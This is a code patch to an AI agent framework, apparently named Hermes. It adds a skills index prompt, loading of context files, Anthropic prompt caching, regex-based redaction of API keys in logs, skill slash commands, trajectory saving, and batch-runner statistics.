Scans ~/.hermes/skills/ for SKILL.md files grouped by category.
Includes per-skill descriptions from frontmatter so the model can
match skills by meaning, not just name.
Filters out skills incompatible with the current OS platform.
"""
hermes_home = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
skills_dir = hermes_home / "skills"
if not skills_dir.exists():
return ""
# Collect skills with descriptions, grouped by category.
# Each entry: (skill_name, description)
# Supports sub-categories: skills/mlops/training/axolotl/SKILL.md
# -> category "mlops/training", skill "axolotl"
skills_by_category: dict[str, list[tuple[str, str]]] = {}
for skill_file in skills_dir.rglob("SKILL.md"):
is_compatible, _, desc = _parse_skill_file(skill_file)
if not is_compatible:
continue
# Skip skills whose conditional activation rules exclude them
conditions = _read_skill_conditions(skill_file)
if not _skill_should_show(conditions, available_tools, available_toolsets):
continue
rel_path = skill_file.relative_to(skills_dir)
parts = rel_path.parts
if len(parts) >= 2:
# Category is everything between skills_dir and the skill folder
# e.g. parts = ("mlops", "training", "axolotl", "SKILL.md")
# → category = "mlops/training", skill_name = "axolotl"
# e.g. parts = ("github", "github-auth", "SKILL.md")
# → category = "github", skill_name = "github-auth"
skill_name = parts[-2]
category = "/".join(parts[:-2]) if len(parts) > 2 else parts[0]
else:
category = "general"
skill_name = skill_file.parent.name
skills_by_category.setdefault(category, []).append((skill_name, desc))
if not skills_by_category:
return ""
# Read category-level descriptions from DESCRIPTION.md
# Checks both the exact category path and parent directories
category_descriptions = {}
for category in skills_by_category:
cat_path = Path(category)
desc_file = skills_dir / cat_path / "DESCRIPTION.md"
if desc_file.exists():
try:
content = desc_file.read_text(encoding="utf-8")
match = re.search(r"^---\s*\n.*?description:\s*(.+?)\s*\n.*?^---", content, re.MULTILINE | re.DOTALL)
if match:
category_descriptions[category] = match.group(1).strip()
except Exception as e:
logger.debug("Could not read skill description %s: %s", desc_file, e)
index_lines = []
for category in sorted(skills_by_category.keys()):
cat_desc = category_descriptions.get(category, "")
if cat_desc:
index_lines.append(f" {category}: {cat_desc}")
else:
index_lines.append(f" {category}:")
# Deduplicate and sort skills within each category
seen = set()
for name, desc in sorted(skills_by_category[category], key=lambda x: x[0]):
if name in seen:
continue
seen.add(name)
if desc:
index_lines.append(f" - {name}: {desc}")
else:
index_lines.append(f" - {name}")
return (
"## Skills (mandatory)\n"
"Before replying, scan the skills below. If one clearly matches your task, "
"load it with skill_view(name) and follow its instructions. "
"If a skill has issues, fix it with skill_manage(action='patch').\n"
"\n"
"<available_skills>\n"
+ "\n".join(index_lines) + "\n"
"</available_skills>\n"
"\n"
"If none match, proceed normally without loading a skill."
)
# =========================================================================
# Context files (SOUL.md, AGENTS.md, .cursorrules)
# =========================================================================
def _truncate_content(content: str, filename: str, max_chars: int = CONTEXT_FILE_MAX_CHARS) -> str:
"""Head/tail truncation with a marker in the middle."""
if len(content) <= max_chars:
return content
head_chars = int(max_chars * CONTEXT_TRUNCATE_HEAD_RATIO)
tail_chars = int(max_chars * CONTEXT_TRUNCATE_TAIL_RATIO)
head = content[:head_chars]
tail = content[-tail_chars:]
marker = f"\n\n[...truncated {filename}: kept {head_chars}+{tail_chars} of {len(content)} chars. Use file tools to read the full file.]\n\n"
return head + marker + tail
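# e.g. a 30,000-char file against the 20,000-char cap keeps a 14,000-char
# head (70%) and a 4,000-char tail (20%) around the truncation marker.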
def build_context_files_prompt(cwd: Optional[str] = None) -> str:
"""Discover and load context files for the system prompt.
Discovery: AGENTS.md (recursive), .cursorrules / .cursor/rules/*.mdc,
SOUL.md (cwd then ~/.hermes/ fallback). Each capped at 20,000 chars.
"""
if cwd is None:
cwd = os.getcwd()
cwd_path = Path(cwd).resolve()
sections = []
# AGENTS.md (hierarchical, recursive)
top_level_agents = None
for name in ["AGENTS.md", "agents.md"]:
candidate = cwd_path / name
if candidate.exists():
top_level_agents = candidate
break
if top_level_agents:
agents_files = []
for root, dirs, files in os.walk(cwd_path):
dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ('node_modules', '__pycache__', 'venv', '.venv')]
for f in files:
if f.lower() == "agents.md":
agents_files.append(Path(root) / f)
agents_files.sort(key=lambda p: len(p.parts))
total_agents_content = ""
for agents_path in agents_files:
try:
content = agents_path.read_text(encoding="utf-8").strip()
if content:
rel_path = agents_path.relative_to(cwd_path)
content = _scan_context_content(content, str(rel_path))
total_agents_content += f"## {rel_path}\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read %s: %s", agents_path, e)
if total_agents_content:
total_agents_content = _truncate_content(total_agents_content, "AGENTS.md")
sections.append(total_agents_content)
# .cursorrules
cursorrules_content = ""
cursorrules_file = cwd_path / ".cursorrules"
if cursorrules_file.exists():
try:
content = cursorrules_file.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, ".cursorrules")
cursorrules_content += f"## .cursorrules\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read .cursorrules: %s", e)
cursor_rules_dir = cwd_path / ".cursor" / "rules"
if cursor_rules_dir.exists() and cursor_rules_dir.is_dir():
mdc_files = sorted(cursor_rules_dir.glob("*.mdc"))
for mdc_file in mdc_files:
try:
content = mdc_file.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, f".cursor/rules/{mdc_file.name}")
cursorrules_content += f"## .cursor/rules/{mdc_file.name}\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read %s: %s", mdc_file, e)
if cursorrules_content:
cursorrules_content = _truncate_content(cursorrules_content, ".cursorrules")
sections.append(cursorrules_content)
# SOUL.md (cwd first, then ~/.hermes/ fallback)
soul_path = None
for name in ["SOUL.md", "soul.md"]:
candidate = cwd_path / name
if candidate.exists():
soul_path = candidate
break
if not soul_path:
global_soul = Path.home() / ".hermes" / "SOUL.md"
if global_soul.exists():
soul_path = global_soul
if soul_path:
try:
content = soul_path.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, "SOUL.md")
content = _truncate_content(content, "SOUL.md")
sections.append(
f"## SOUL.md\n\nIf SOUL.md is present, embody its persona and tone. "
f"Avoid stiff, generic replies; follow its guidance unless higher-priority "
f"instructions override it.\n\n{content}"
)
except Exception as e:
logger.debug("Could not read SOUL.md from %s: %s", soul_path, e)
if not sections:
return ""
return "# Project Context\n\nThe following project context files have been loaded and should be followed:\n\n" + "\n".join(sections)

68
agent/prompt_caching.py Normal file

@@ -0,0 +1,68 @@
"""Anthropic prompt caching (system_and_3 strategy).
Reduces input token costs by ~75% on multi-turn conversations by caching
the conversation prefix. Uses 4 cache_control breakpoints (Anthropic max):
1. System prompt (stable across all turns)
2-4. Last 3 non-system messages (rolling window)
Pure functions -- no class state, no AIAgent dependency.
"""
import copy
from typing import Any, Dict, List
def _apply_cache_marker(msg: dict, cache_marker: dict) -> None:
"""Add cache_control to a single message, handling all format variations."""
role = msg.get("role", "")
content = msg.get("content")
if role == "tool":
msg["cache_control"] = cache_marker
return
if content is None:
msg["cache_control"] = cache_marker
return
if isinstance(content, str):
msg["content"] = [{"type": "text", "text": content, "cache_control": cache_marker}]
return
if isinstance(content, list) and content:
last = content[-1]
if isinstance(last, dict):
last["cache_control"] = cache_marker
def apply_anthropic_cache_control(
api_messages: List[Dict[str, Any]],
cache_ttl: str = "5m",
) -> List[Dict[str, Any]]:
"""Apply system_and_3 caching strategy to messages for Anthropic models.
Places up to 4 cache_control breakpoints: system prompt + last 3 non-system messages.
Returns:
Deep copy of messages with cache_control breakpoints injected.
"""
messages = copy.deepcopy(api_messages)
if not messages:
return messages
marker = {"type": "ephemeral"}
if cache_ttl == "1h":
marker["ttl"] = "1h"
breakpoints_used = 0
if messages[0].get("role") == "system":
_apply_cache_marker(messages[0], marker)
breakpoints_used += 1
remaining = 4 - breakpoints_used
non_sys = [i for i in range(len(messages)) if messages[i].get("role") != "system"]
for idx in non_sys[-remaining:]:
_apply_cache_marker(messages[idx], marker)
return messages
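# Usage sketch (sys_prompt and turns are placeholder values): with a system
# prompt plus several turns, breakpoints land on the system message and the
# last three non-system messages.
#   msgs = [{"role": "system", "content": sys_prompt}, *turns]
#   cached = apply_anthropic_cache_control(msgs, cache_ttl="1h")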

161
agent/redact.py Normal file

@@ -0,0 +1,161 @@
"""Regex-based secret redaction for logs and tool output.
Applies pattern matching to mask API keys, tokens, and credentials
before they reach log files, verbose output, or gateway logs.
Short tokens (< 18 chars) are fully masked. Longer tokens preserve
the first 6 and last 4 characters for debuggability.
"""
import logging
import os
import re
logger = logging.getLogger(__name__)
# Known API key prefixes -- match the prefix + contiguous token chars
_PREFIX_PATTERNS = [
r"sk-[A-Za-z0-9_-]{10,}", # OpenAI / OpenRouter / Anthropic (sk-ant-*)
r"ghp_[A-Za-z0-9]{10,}", # GitHub PAT (classic)
r"github_pat_[A-Za-z0-9_]{10,}", # GitHub PAT (fine-grained)
r"xox[baprs]-[A-Za-z0-9-]{10,}", # Slack tokens
r"AIza[A-Za-z0-9_-]{30,}", # Google API keys
r"pplx-[A-Za-z0-9]{10,}", # Perplexity
r"fal_[A-Za-z0-9_-]{10,}", # Fal.ai
r"fc-[A-Za-z0-9]{10,}", # Firecrawl
r"bb_live_[A-Za-z0-9_-]{10,}", # BrowserBase
r"gAAAA[A-Za-z0-9_=-]{20,}", # Codex encrypted tokens
r"AKIA[A-Z0-9]{16}", # AWS Access Key ID
r"sk_live_[A-Za-z0-9]{10,}", # Stripe secret key (live)
r"sk_test_[A-Za-z0-9]{10,}", # Stripe secret key (test)
r"rk_live_[A-Za-z0-9]{10,}", # Stripe restricted key
r"SG\.[A-Za-z0-9_-]{10,}", # SendGrid API key
r"hf_[A-Za-z0-9]{10,}", # HuggingFace token
r"r8_[A-Za-z0-9]{10,}", # Replicate API token
r"npm_[A-Za-z0-9]{10,}", # npm access token
r"pypi-[A-Za-z0-9_-]{10,}", # PyPI API token
r"dop_v1_[A-Za-z0-9]{10,}", # DigitalOcean PAT
r"doo_v1_[A-Za-z0-9]{10,}", # DigitalOcean OAuth
r"am_[A-Za-z0-9_-]{10,}", # AgentMail API key
]
# ENV assignment patterns: KEY=value where KEY contains a secret-like name
_SECRET_ENV_NAMES = r"(?:API_?KEY|TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL|AUTH)"
_ENV_ASSIGN_RE = re.compile(
rf"([A-Z_]*{_SECRET_ENV_NAMES}[A-Z_]*)\s*=\s*(['\"]?)(\S+)\2",
re.IGNORECASE,
)
# JSON field patterns: "apiKey": "value", "token": "value", etc.
_JSON_KEY_NAMES = r"(?:api_?[Kk]ey|token|secret|password|access_token|refresh_token|auth_token|bearer|secret_value|raw_secret|secret_input|key_material)"
_JSON_FIELD_RE = re.compile(
rf'("{_JSON_KEY_NAMES}")\s*:\s*"([^"]+)"',
re.IGNORECASE,
)
# Authorization headers
_AUTH_HEADER_RE = re.compile(
r"(Authorization:\s*Bearer\s+)(\S+)",
re.IGNORECASE,
)
# Telegram bot tokens: bot<digits>:<token> or <digits>:<token>,
# where token part is restricted to [-A-Za-z0-9_] and length >= 30
_TELEGRAM_RE = re.compile(
r"(bot)?(\d{8,}):([-A-Za-z0-9_]{30,})",
)
# Private key blocks: -----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----
_PRIVATE_KEY_RE = re.compile(
r"-----BEGIN[A-Z ]*PRIVATE KEY-----[\s\S]*?-----END[A-Z ]*PRIVATE KEY-----"
)
# Database connection strings: protocol://user:PASSWORD@host
# Catches postgres, mysql, mongodb, redis, amqp URLs and redacts the password
_DB_CONNSTR_RE = re.compile(
r"((?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis|amqp)://[^:]+:)([^@]+)(@)",
re.IGNORECASE,
)
# E.164 phone numbers: +<country><number>, 7-15 digits
# Negative lookahead prevents matching hex strings or identifiers
_SIGNAL_PHONE_RE = re.compile(r"(\+[1-9]\d{6,14})(?![A-Za-z0-9])")
# Compile known prefix patterns into one alternation
_PREFIX_RE = re.compile(
r"(?<![A-Za-z0-9_-])(" + "|".join(_PREFIX_PATTERNS) + r")(?![A-Za-z0-9_-])"
)
def _mask_token(token: str) -> str:
"""Mask a token, preserving prefix for long tokens."""
if len(token) < 18:
return "***"
return f"{token[:6]}...{token[-4:]}"
def redact_sensitive_text(text: str) -> str:
"""Apply all redaction patterns to a block of text.
Safe to call on any string -- non-matching text passes through unchanged.
Disabled when security.redact_secrets is false in config.yaml, which is checked here via the HERMES_REDACT_SECRETS env var.
"""
if not text:
return text
if os.getenv("HERMES_REDACT_SECRETS", "").lower() in ("0", "false", "no", "off"):
return text
# Known prefixes (sk-, ghp_, etc.)
text = _PREFIX_RE.sub(lambda m: _mask_token(m.group(1)), text)
# ENV assignments: OPENAI_API_KEY=sk-abc...
def _redact_env(m):
name, quote, value = m.group(1), m.group(2), m.group(3)
return f"{name}={quote}{_mask_token(value)}{quote}"
text = _ENV_ASSIGN_RE.sub(_redact_env, text)
# JSON fields: "apiKey": "value"
def _redact_json(m):
key, value = m.group(1), m.group(2)
return f'{key}: "{_mask_token(value)}"'
text = _JSON_FIELD_RE.sub(_redact_json, text)
# Authorization headers
text = _AUTH_HEADER_RE.sub(
lambda m: m.group(1) + _mask_token(m.group(2)),
text,
)
# Telegram bot tokens
def _redact_telegram(m):
prefix = m.group(1) or ""
digits = m.group(2)
return f"{prefix}{digits}:***"
text = _TELEGRAM_RE.sub(_redact_telegram, text)
# Private key blocks
text = _PRIVATE_KEY_RE.sub("[REDACTED PRIVATE KEY]", text)
# Database connection string passwords
text = _DB_CONNSTR_RE.sub(lambda m: f"{m.group(1)}***{m.group(3)}", text)
# E.164 phone numbers (Signal, WhatsApp)
def _redact_phone(m):
phone = m.group(1)
if len(phone) <= 8:
return phone[:2] + "****" + phone[-2:]
return phone[:4] + "****" + phone[-4:]
text = _SIGNAL_PHONE_RE.sub(_redact_phone, text)
return text
class RedactingFormatter(logging.Formatter):
"""Log formatter that redacts secrets from all log messages."""
def format(self, record: logging.LogRecord) -> str:
original = super().format(record)
return redact_sensitive_text(original)
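A minimal wiring sketch (the handler setup and sample strings are illustrative; RedactingFormatter and redact_sensitive_text are as defined above):

import logging

from agent.redact import RedactingFormatter, redact_sensitive_text

handler = logging.StreamHandler()
handler.setFormatter(RedactingFormatter("%(levelname)s %(message)s"))
log = logging.getLogger("redact-demo")
log.addHandler(handler)
log.setLevel(logging.INFO)

# Known key prefix: long tokens keep the first 6 and last 4 characters
log.info("using token sk-abcdefghijklmnopqrstuvwxyz123456")
# -> INFO using token sk-abc...3456

# ENV assignment: short values are fully masked
print(redact_sensitive_text("DB_PASSWORD=hunter2"))
# -> DB_PASSWORD=***

# Connection-string password
print(redact_sensitive_text("postgres://app:hunter2@db.internal:5432/main"))
# -> postgres://app:***@db.internal:5432/main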

159
agent/skill_commands.py Normal file

@@ -0,0 +1,159 @@
"""Skill slash commands — scan installed skills and build invocation messages.
Shared between CLI (cli.py) and gateway (gateway/run.py) so both surfaces
can invoke skills via /skill-name commands.
"""
import json
import logging
from pathlib import Path
from typing import Any, Dict, Optional
logger = logging.getLogger(__name__)
_skill_commands: Dict[str, Dict[str, Any]] = {}
def scan_skill_commands() -> Dict[str, Dict[str, Any]]:
"""Scan ~/.hermes/skills/ and return a mapping of /command -> skill info.
Returns:
Dict mapping "/skill-name" to {name, description, skill_md_path, skill_dir}.
"""
global _skill_commands
_skill_commands = {}
try:
from tools.skills_tool import SKILLS_DIR, _parse_frontmatter, skill_matches_platform
if not SKILLS_DIR.exists():
return _skill_commands
for skill_md in SKILLS_DIR.rglob("SKILL.md"):
if any(part in ('.git', '.github', '.hub') for part in skill_md.parts):
continue
try:
content = skill_md.read_text(encoding='utf-8')
frontmatter, body = _parse_frontmatter(content)
# Skip skills incompatible with the current OS platform
if not skill_matches_platform(frontmatter):
continue
name = frontmatter.get('name', skill_md.parent.name)
description = frontmatter.get('description', '')
if not description:
for line in body.strip().split('\n'):
line = line.strip()
if line and not line.startswith('#'):
description = line[:80]
break
cmd_name = name.lower().replace(' ', '-').replace('_', '-')
_skill_commands[f"/{cmd_name}"] = {
"name": name,
"description": description or f"Invoke the {name} skill",
"skill_md_path": str(skill_md),
"skill_dir": str(skill_md.parent),
}
except Exception:
continue
except Exception:
pass
return _skill_commands
def get_skill_commands() -> Dict[str, Dict[str, Any]]:
"""Return the current skill commands mapping (scan first if empty)."""
if not _skill_commands:
scan_skill_commands()
return _skill_commands
def build_skill_invocation_message(
cmd_key: str,
user_instruction: str = "",
task_id: str | None = None,
) -> Optional[str]:
"""Build the user message content for a skill slash command invocation.
Args:
cmd_key: The command key including leading slash (e.g., "/gif-search").
user_instruction: Optional text the user typed after the command.
task_id: Optional task identifier passed through to skill_view.
Returns:
The formatted message string, or None if the skill wasn't found.
"""
commands = get_skill_commands()
skill_info = commands.get(cmd_key)
if not skill_info:
return None
skill_name = skill_info["name"]
skill_path = skill_info["skill_dir"]
try:
from tools.skills_tool import SKILLS_DIR, skill_view
loaded_skill = json.loads(skill_view(skill_path, task_id=task_id))
except Exception:
return f"[Failed to load skill: {skill_name}]"
if not loaded_skill.get("success"):
return f"[Failed to load skill: {skill_name}]"
content = str(loaded_skill.get("content") or "")
skill_dir = Path(skill_info["skill_dir"])
parts = [
f'[SYSTEM: The user has invoked the "{skill_name}" skill, indicating they want you to follow its instructions. The full skill content is loaded below.]',
"",
content.strip(),
]
if loaded_skill.get("setup_skipped"):
parts.extend(
[
"",
"[Skill setup note: Required environment setup was skipped. Continue loading the skill and explain any reduced functionality if it matters.]",
]
)
elif loaded_skill.get("gateway_setup_hint"):
parts.extend(
[
"",
f"[Skill setup note: {loaded_skill['gateway_setup_hint']}]",
]
)
elif loaded_skill.get("setup_needed") and loaded_skill.get("setup_note"):
parts.extend(
[
"",
f"[Skill setup note: {loaded_skill['setup_note']}]",
]
)
supporting = []
linked_files = loaded_skill.get("linked_files") or {}
for entries in linked_files.values():
if isinstance(entries, list):
supporting.extend(entries)
if not supporting:
for subdir in ("references", "templates", "scripts", "assets"):
subdir_path = skill_dir / subdir
if subdir_path.exists():
for f in sorted(subdir_path.rglob("*")):
if f.is_file():
rel = str(f.relative_to(skill_dir))
supporting.append(rel)
if supporting:
skill_view_target = str(Path(skill_path).relative_to(SKILLS_DIR))
parts.append("")
parts.append("[This skill has supporting files you can load with the skill_view tool:]")
for sf in supporting:
parts.append(f"- {sf}")
parts.append(
f'\nTo view any of these, use: skill_view(name="{skill_view_target}", file_path="<path>")'
)
if user_instruction:
parts.append("")
parts.append(f"The user has provided the following instruction alongside the skill invocation: {user_instruction}")
return "\n".join(parts)

56
agent/trajectory.py Normal file

@@ -0,0 +1,56 @@
"""Trajectory saving utilities and static helpers.
_convert_to_trajectory_format stays as an AIAgent method (batch_runner.py
calls agent._convert_to_trajectory_format). Only the static helpers and
the file-write logic live here.
"""
import json
import logging
from datetime import datetime
from typing import Any, Dict, List
logger = logging.getLogger(__name__)
def convert_scratchpad_to_think(content: str) -> str:
"""Convert <REASONING_SCRATCHPAD> tags to <think> tags."""
if not content or "<REASONING_SCRATCHPAD>" not in content:
return content
return content.replace("<REASONING_SCRATCHPAD>", "<think>").replace("</REASONING_SCRATCHPAD>", "</think>")
def has_incomplete_scratchpad(content: str) -> bool:
"""Check if content has an opening <REASONING_SCRATCHPAD> without a closing tag."""
if not content:
return False
return "<REASONING_SCRATCHPAD>" in content and "</REASONING_SCRATCHPAD>" not in content
def save_trajectory(trajectory: List[Dict[str, Any]], model: str,
completed: bool, filename: str | None = None):
"""Append a trajectory entry to a JSONL file.
Args:
trajectory: The ShareGPT-format conversation list.
model: Model name for metadata.
completed: Whether the conversation completed successfully.
filename: Override output filename. Defaults to trajectory_samples.jsonl
or failed_trajectories.jsonl based on ``completed``.
"""
if filename is None:
filename = "trajectory_samples.jsonl" if completed else "failed_trajectories.jsonl"
entry = {
"conversations": trajectory,
"timestamp": datetime.now().isoformat(),
"model": model,
"completed": completed,
}
try:
with open(filename, "a", encoding="utf-8") as f:
f.write(json.dumps(entry, ensure_ascii=False) + "\n")
logger.info("Trajectory saved to %s", filename)
except Exception as e:
logger.warning("Failed to save trajectory: %s", e)

BIN
assets/banner.png Normal file (new binary, 12 KiB; contents not shown)

batch_runner.py

@@ -27,23 +27,87 @@ import time
from pathlib import Path
from typing import List, Dict, Any, Optional, Tuple
from datetime import datetime
from multiprocessing import Pool, Manager, Lock
from multiprocessing import Pool, Lock
import traceback
from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn, TimeRemainingColumn, MofNCompleteColumn
from rich.console import Console
import fire
from run_agent import AIAgent
from toolset_distributions import (
get_distribution,
list_distributions,
sample_toolsets_from_distribution,
validate_distribution
)
from model_tools import TOOL_TO_TOOLSET_MAP
# Global configuration for worker processes
_WORKER_CONFIG = {}
# All possible tools - auto-derived from the master mapping in model_tools.py.
# This stays in sync automatically when new tools are added to TOOL_TO_TOOLSET_MAP.
# Used for consistent schema in Arrow/Parquet (HuggingFace datasets) and for
# filtering corrupted entries during trajectory combination.
ALL_POSSIBLE_TOOLS = set(TOOL_TO_TOOLSET_MAP.keys())
# Default stats for tools that weren't used
DEFAULT_TOOL_STATS = {'count': 0, 'success': 0, 'failure': 0}
def _normalize_tool_stats(tool_stats: Dict[str, Dict[str, int]]) -> Dict[str, Dict[str, int]]:
"""
Normalize tool_stats to include all possible tools with consistent schema.
This ensures HuggingFace datasets can load the JSONL without schema mismatch errors.
Tools that weren't used get zero counts.
Args:
tool_stats (Dict): Raw tool statistics from extraction
Returns:
Dict: Normalized tool statistics with all tools present
"""
normalized = {}
# Add all possible tools with defaults
for tool in ALL_POSSIBLE_TOOLS:
if tool in tool_stats:
normalized[tool] = tool_stats[tool].copy()
else:
normalized[tool] = DEFAULT_TOOL_STATS.copy()
# Also include any unexpected tools (in case new tools are added)
for tool, stats in tool_stats.items():
if tool not in normalized:
normalized[tool] = stats.copy()
return normalized
def _normalize_tool_error_counts(tool_error_counts: Dict[str, int]) -> Dict[str, int]:
"""
Normalize tool_error_counts to include all possible tools.
Args:
tool_error_counts (Dict): Raw error counts mapping
Returns:
Dict: Normalized error counts with all tools present
"""
normalized = {}
# Add all possible tools with zero defaults
for tool in ALL_POSSIBLE_TOOLS:
normalized[tool] = tool_error_counts.get(tool, 0)
# Also include any unexpected tools
for tool, count in tool_error_counts.items():
if tool not in normalized:
normalized[tool] = count
return normalized
def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, int]]:
"""
@@ -107,7 +171,7 @@ def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, i
if content_json.get("success") is False:
is_success = False
except:
except (json.JSONDecodeError, ValueError, TypeError):
# If not JSON, check if content is empty or explicitly states an error
# Note: We avoid simple substring matching to prevent false positives
if not content:
@@ -127,6 +191,42 @@ def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, i
return tool_stats
def _extract_reasoning_stats(messages: List[Dict[str, Any]]) -> Dict[str, int]:
"""
Count how many assistant turns have reasoning vs no reasoning.
Checks for <REASONING_SCRATCHPAD> in content or a non-empty 'reasoning' field
(native thinking tokens). Returns counts for tracking reasoning coverage.
Args:
messages: Message history
Returns:
Dict with 'total_assistant_turns', 'turns_with_reasoning', 'turns_without_reasoning'
"""
total = 0
with_reasoning = 0
for msg in messages:
if msg.get("role") != "assistant":
continue
total += 1
content = msg.get("content", "") or ""
has_scratchpad = "<REASONING_SCRATCHPAD>" in content
has_native_reasoning = bool((msg.get("reasoning") or "").strip())
if has_scratchpad or has_native_reasoning:
with_reasoning += 1
return {
"total_assistant_turns": total,
"turns_with_reasoning": with_reasoning,
"turns_without_reasoning": total - with_reasoning,
"has_any_reasoning": with_reasoning > 0,
}
def _process_single_prompt(
prompt_index: int,
prompt_data: Dict[str, Any],
@@ -138,7 +238,7 @@ def _process_single_prompt(
Args:
prompt_index (int): Index of prompt in dataset
prompt_data (Dict): Prompt data containing 'prompt' field
prompt_data (Dict): Prompt data containing 'prompt' field and optional 'image' field
batch_num (int): Batch number
config (Dict): Configuration dict with agent parameters
@@ -146,6 +246,58 @@ def _process_single_prompt(
Dict: Result containing trajectory, stats, and metadata
"""
prompt = prompt_data["prompt"]
task_id = f"task_{prompt_index}"
# Per-prompt container image override: if the dataset row has an 'image' field,
# register it for this task's sandbox. Works with Docker, Modal, Singularity, and Daytona.
container_image = prompt_data.get("image") or prompt_data.get("docker_image")
if container_image:
# Verify the image is accessible before spending tokens on the agent loop.
# For Docker: check local cache, then try pulling.
# For Modal: skip local check (Modal pulls server-side).
env_type = os.getenv("TERMINAL_ENV", "local")
if env_type == "docker":
import subprocess as _sp
try:
probe = _sp.run(
["docker", "image", "inspect", container_image],
capture_output=True, timeout=10,
)
if probe.returncode != 0:
if config.get("verbose"):
print(f" Prompt {prompt_index}: Pulling docker image {container_image}...", flush=True)
pull = _sp.run(
["docker", "pull", container_image],
capture_output=True, text=True, timeout=600,
)
if pull.returncode != 0:
return {
"success": False,
"prompt_index": prompt_index,
"error": f"Docker image not available: {container_image}\n{pull.stderr[:500]}",
"trajectory": None,
"tool_stats": {},
"toolsets_used": [],
"metadata": {"batch_num": batch_num, "timestamp": datetime.now().isoformat()},
}
except FileNotFoundError:
pass # Docker CLI not installed — skip check (e.g., Modal backend)
except Exception as img_err:
if config.get("verbose"):
print(f" Prompt {prompt_index}: Docker image check failed: {img_err}", flush=True)
from tools.terminal_tool import register_task_env_overrides
overrides = {
"docker_image": container_image,
"modal_image": container_image,
"singularity_image": f"docker://{container_image}",
"daytona_image": container_image,
}
if prompt_data.get("cwd"):
overrides["cwd"] = prompt_data["cwd"]
register_task_env_overrides(task_id, overrides)
if config.get("verbose"):
print(f" Prompt {prompt_index}: Using container image {container_image}")
try:
# Sample toolsets from distribution for this prompt
@@ -154,7 +306,8 @@ def _process_single_prompt(
if config.get("verbose"):
print(f" Prompt {prompt_index}: Using toolsets {selected_toolsets}")
# Initialize agent with sampled toolsets
# Initialize agent with sampled toolsets and log prefix for identification
log_prefix = f"[B{batch_num}:P{prompt_index}]"
agent = AIAgent(
base_url=config.get("base_url"),
api_key=config.get("api_key"),
@@ -164,15 +317,28 @@ def _process_single_prompt(
save_trajectories=False, # We handle saving ourselves
verbose_logging=config.get("verbose", False),
ephemeral_system_prompt=config.get("ephemeral_system_prompt"),
log_prefix_chars=config.get("log_prefix_chars", 100)
log_prefix_chars=config.get("log_prefix_chars", 100),
log_prefix=log_prefix,
providers_allowed=config.get("providers_allowed"),
providers_ignored=config.get("providers_ignored"),
providers_order=config.get("providers_order"),
provider_sort=config.get("provider_sort"),
max_tokens=config.get("max_tokens"),
reasoning_config=config.get("reasoning_config"),
prefill_messages=config.get("prefill_messages"),
skip_context_files=True, # Don't pollute trajectories with SOUL.md/AGENTS.md
skip_memory=True, # Don't use persistent memory in batch runs
)
# Run the agent with task_id to ensure each task gets its own isolated VM
result = agent.run_conversation(prompt, task_id=f"task_{prompt_index}")
result = agent.run_conversation(prompt, task_id=task_id)
# Extract tool usage statistics
tool_stats = _extract_tool_stats(result["messages"])
# Extract reasoning coverage stats
reasoning_stats = _extract_reasoning_stats(result["messages"])
# Convert to trajectory format (using existing method)
trajectory = agent._convert_to_trajectory_format(
result["messages"],
@@ -185,7 +351,9 @@ def _process_single_prompt(
"prompt_index": prompt_index,
"trajectory": trajectory,
"tool_stats": tool_stats,
"reasoning_stats": reasoning_stats,
"completed": result["completed"],
"partial": result.get("partial", False),
"api_calls": result["api_calls"],
"toolsets_used": selected_toolsets,
"metadata": {
@@ -252,7 +420,9 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
# Initialize aggregated stats for this batch
batch_tool_stats = {}
batch_reasoning_stats = {"total_assistant_turns": 0, "turns_with_reasoning": 0, "turns_without_reasoning": 0}
completed_in_batch = []
discarded_no_reasoning = 0
# Process each prompt sequentially in this batch
for prompt_index, prompt_data in prompts_to_process:
@@ -266,13 +436,34 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
# Save trajectory if successful
if result["success"] and result["trajectory"]:
# Discard samples with zero reasoning across all turns
reasoning = result.get("reasoning_stats", {})
if not reasoning.get("has_any_reasoning", True):
print(f" 🚫 Prompt {prompt_index} discarded (no reasoning in any turn)")
discarded_no_reasoning += 1
continue
# Get and normalize tool stats for consistent schema across all entries
raw_tool_stats = result.get("tool_stats", {})
tool_stats = _normalize_tool_stats(raw_tool_stats)
# Create normalized tool_error_counts mapping tool names to their failure counts
raw_error_counts = {
tool_name: stats.get("failure", 0)
for tool_name, stats in raw_tool_stats.items()
}
tool_error_counts = _normalize_tool_error_counts(raw_error_counts)
trajectory_entry = {
"prompt_index": prompt_index,
"conversations": result["trajectory"],
"metadata": result["metadata"],
"completed": result["completed"],
"partial": result.get("partial", False), # True if stopped due to invalid tool calls
"api_calls": result["api_calls"],
"toolsets_used": result["toolsets_used"]
"toolsets_used": result["toolsets_used"],
"tool_stats": tool_stats, # Full stats: {tool: {count, success, failure}} - normalized
"tool_error_counts": tool_error_counts # Simple: {tool: failure_count} - normalized
}
# Append to batch output file
@@ -292,8 +483,17 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
batch_tool_stats[tool_name]["success"] += stats["success"]
batch_tool_stats[tool_name]["failure"] += stats["failure"]
completed_in_batch.append(prompt_index)
print(f" ✅ Prompt {prompt_index} completed")
# Aggregate reasoning stats
for key in batch_reasoning_stats:
batch_reasoning_stats[key] += result.get("reasoning_stats", {}).get(key, 0)
# Only mark as completed if successfully saved (failed prompts can be retried on resume)
if result["success"] and result["trajectory"]:
completed_in_batch.append(prompt_index)
status = "⚠️ partial" if result.get("partial") else "✅"
print(f" {status} Prompt {prompt_index} completed")
else:
print(f" ❌ Prompt {prompt_index} failed (will retry on resume)")
